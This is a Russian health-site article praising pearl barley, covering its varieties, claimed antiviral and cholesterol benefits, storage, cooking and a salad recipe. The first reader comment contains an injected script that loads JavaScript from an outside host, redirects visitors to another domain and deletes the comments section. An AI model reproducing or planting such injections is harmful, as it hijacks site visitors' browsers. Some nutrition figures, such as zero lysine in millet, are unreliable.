Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Перловая крупа – для крас...  >>  Перловая крупа – для красивой кожи и против вирусов
 
Обратная связь
 

Перловая крупа – для красивой кожи и против вирусов

Размер шрифта
13 декабря 2011 07:13
  • google_analytics: false
  • Нравится

На редкость полезная перловая крупа богата аминокислотами и минеральными веществами. Как выбрать, как хранить, и что еще можно приготовить из перловой крупы, помимо каши и супа?

Что такое перловая крупа?

Это ячмень, очищенный от волокнистой шелухи и «отполированный». Перловая крупа проходит процесс шлифовки 6 раз.

Разновидности перловой крупы:

1. Перловка – целое зерно, с которого частично снята ость.
2. «Голландка» – целое зерно, скатанное до шарика, и полностью освобожденное от ости.
3. Ячневая крупа – мелкорубленая перловая крупа.

Чем полезна перловая крупа?

  1. Содержит лизин – аминокислоту, которая имеет противовирусные свойства и участвует в синтезе белков для строения мышц и роста клеток. Лизин помогает организму усваивать из крови кальций и образовывать коллаген, необходимый для упругой кожи.

  2. В зернах перловой крупы есть грубые волокна, которые выводят «плохой» холестерин.

  3. Пропионовая кислота в перловой крупе снижает уровень холестерина в крови. Кислота воздействует на фермент редуктазу, которая участвует в образовании холестерина в печени.

  4. В перловой крупе есть ниацин, витамин группы B, который предотвращает окисление холестерина свободными радикалами, после чего он становится опасным для сосудов.

  5. Минералы, содержащиеся в перловой крупе, снижают риск заболевания диабетом 2 типа.

Пьедестал почета по количеству лизина

1. Ржаная крупа – 605 мг
2. Перловая крупа – 369 мг
3. Пшенная крупа – 0 мг

Суточная доза лизина – 1250 мг в день, то есть 340 г перловой крупы.

Как выбрать

  • При покупке крупы в магазине проверьте, чтобы упаковка была сухой и закрытой, иначе перловка может испортиться. Убедитесь, что в упаковке нет влаги.
  • Откажитесь от покупки муки из перловой крупы, так как она больше переработана и содержит меньше полезных веществ, чем крупа.
  • Не покупайте консервированную перловую кашу – в ней, как и во всех консервах, много соли и других консервантов. Тем более откажитесь от консервированных каш с мясом из некачественных животных жиров и трансжиров.

Как хранить?

  • Храните перловку в прохладном, темном и сухом месте, лучше всего в непрозрачной герметичной банке.
  • Зерно может хранить до 2 лет, молотую крупу – не дольше 2-3 месяцев.

Как готовить

  • Перед тем, как готовить перловку, нужно замочить ее на ночь, чтобы крупа разбухла и быстрее сварилась. Разбухшую крупу варить в кипяченой воде 45-60 минут, на 1 часть крупы – 3 части воды.
Рецепт салата с перловой кашей

1. Смешать 250 г сваренной перловой каши с 1 мускатной тыквой, почищенной и порезанной на длинные кусочки, с 300 г порезанных брокколи, 100 г помидоров, 1 ст. ложкой каперсов, 2 ст. ложками тыквенных семечек.
2. Заправить соусом из оливкового масла, бальзамического уксуса и чеснока.

Видеосюжеты по теме:

Перловка. Каша Пифагора






 

 

 

 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - sherozia

08 апреля 2016 в 20:43

Цитировать   |   Пожаловаться

Она такая невкусная) Если только вот с тушенкой её приготовить.

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.